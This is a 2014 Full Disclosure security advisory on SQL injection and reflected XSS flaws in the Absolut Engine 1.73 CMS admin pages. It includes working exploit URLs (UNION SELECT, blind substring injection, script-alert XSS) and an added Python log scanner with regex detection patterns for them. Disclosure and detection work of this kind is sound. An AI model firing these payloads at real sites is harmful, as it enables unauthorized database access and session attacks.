Message-ID: <CALH-=7y-c4zZLyxZm2t5YZujGqPtFr80juP=rphhabnC-c0=uA@mail.gmail.com>
Date: Tue, 30 Dec 2014 06:50:25 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Multiple SQL Injections and Reflecting XSS in Absolut Engine v. 1.73 CMS

Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v. 1.73 CMS

Advisory ID: SROEADV-2014-08

Author: Steffen Rösemann

Affected Software: CMS Absolut Engine v. 1.73

Vendor URL: http://www.absolutengine.com/

Vendor Status: solved

CVE-ID: -


==========================
Vulnerability Description:
==========================


The CMS Absolut Engine v. 1.73, which is no longer actively developed, has multiple SQL injection vulnerabilities and an XSS vulnerability in its administrative backend.


==================
Technical Details:
==================


The following PHP scripts are prone to SQL injection. All of them live under /admin/, and the example requests carry the username and session parameters of a logged-in backend user.


managersection.php (via sectionID parameter):

http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1

Exploit Example:

http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1%27+and+1=2+union+select+1,version%28%29,3,4,5,6+--+


edituser.php (via userID parameter):

http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3

Exploit Example:

http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3%27+and+1=2+union+select+1,user%28%29,3,version%28%29,5,database%28%29,7,8,9+--+



admin.php (via username parameter, blind SQL injection):

http://{TARGET}/admin/admin.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7

Exploit Example:

http://{TARGET}/admin/admin.php?username=admin%27+and+substring%28user%28%29,1,4%29=%27root%27+--+&session=c8d7ebc95b9b1a72d3b54eb59bea56c7


managerrelated.php (via title parameter):

http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}

Exploit Example:

http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}%27+and+1=2+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12+--+


The last script, managerrelated.php, is also vulnerable to reflected XSS via the same title parameter.

Exploit Example:

http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E

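The request patterns above from a defender's side: an added example (not the advisory's or the CMS's code) that scans constructed access-log lines for requests to the four affected admin scripts and flags parameter values carrying the injection or XSS markers shown. Script and parameter names come from the advisory; the log format, marker heuristics and client IP address are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts and parameters named in the advisory, with the type each expects.
NUMERIC_PARAMS = {"/admin/managersection.php": ["sectionID"],
                  "/admin/edituser.php": ["userID"]}
TEXT_PARAMS = {"/admin/admin.php": ["username"],
               "/admin/managerrelated.php": ["title"]}
# Assumed heuristics: quote-then-boolean, UNION SELECT or a trailing comment
# for SQLi; an HTML tag or the '">' attribute break-out for reflected XSS.
SQL_MARKER = re.compile(r"(?i)'\s*(and|or)\b|\bunion\s+select\b|--\s*$")
HTML_MARKER = re.compile(r'(?i)<\s*/?[a-z]+|"\s*>')
REQUEST_TARGET = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def inspect_request(target):
    """Return findings ("sqli:param" / "xss:param") for one request target."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # also URL-decodes
    findings = []
    for name in NUMERIC_PARAMS.get(parts.path, []):
        for value in params.get(name, []):
            if not value.strip().isdigit():  # an ID must be a plain integer
                findings.append(f"sqli:{name}")
    for name in TEXT_PARAMS.get(parts.path, []):
        for value in params.get(name, []):
            if SQL_MARKER.search(value):
                findings.append(f"sqli:{name}")
            if HTML_MARKER.search(value):
                findings.append(f"xss:{name}")
    return findings

def scan_access_log(text):
    """Map each flagged access-log line number (1-based) to its findings."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_TARGET.search(line)
        if m and (found := inspect_request(m.group(1))):
            hits[lineno] = found
    return hits

# Constructed sample log (Common Log Format, documentation-range client IP);
# the request targets are the ones listed in the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Dec/2014:06:50:25 +0100] "GET /admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1 HTTP/1.1" 200 512
203.0.113.5 - - [30/Dec/2014:06:51:02 +0100] "GET /admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1%27+and+1=2+union+select+1,version%28%29,3,4,5,6+--+ HTTP/1.1" 200 640
203.0.113.5 - - [30/Dec/2014:06:52:10 +0100] "GET /admin/admin.php?username=admin%27+and+substring%28user%28%29,1,4%29=%27root%27+--+&session=c8d7ebc95b9b1a72d3b54eb59bea56c7 HTTP/1.1" 200 300
203.0.113.5 - - [30/Dec/2014:06:53:41 +0100] "GET /admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E HTTP/1.1" 200 410
"""
```

The benign first line produces no finding; the numeric check on sectionID and userID is deliberately strict, so any non-integer value in those parameters is reported even when no SQL keyword is present.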

Although this is a product which is not actively developed anymore, I think it is worth mentioning, as the idea (of the lists) is to keep tracking (unknown) vulnerabilities in software products (but that is a personal point of view).

Moreover, this product is still in use by some sites (!) and it is offered without a hint of its status.


=========
Solution:
=========

As the CMS is not actively developed, it shouldn't be used anymore.


====================
Disclosure Timeline:
====================

29-Dec-2014 - found the vulnerability
29-Dec-2014 - informed the developers
29-Dec-2014 - release date of this security advisory [without technical details]
30-Dec-2014 - vendor responded, won't patch vulnerabilities
30-Dec-2014 - release date of this security advisory
30-Dec-2014 - post on Full Disclosure



========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.


===========
References:
===========

http://www.absolutengine.com/
http://sroesemann.blogspot.de
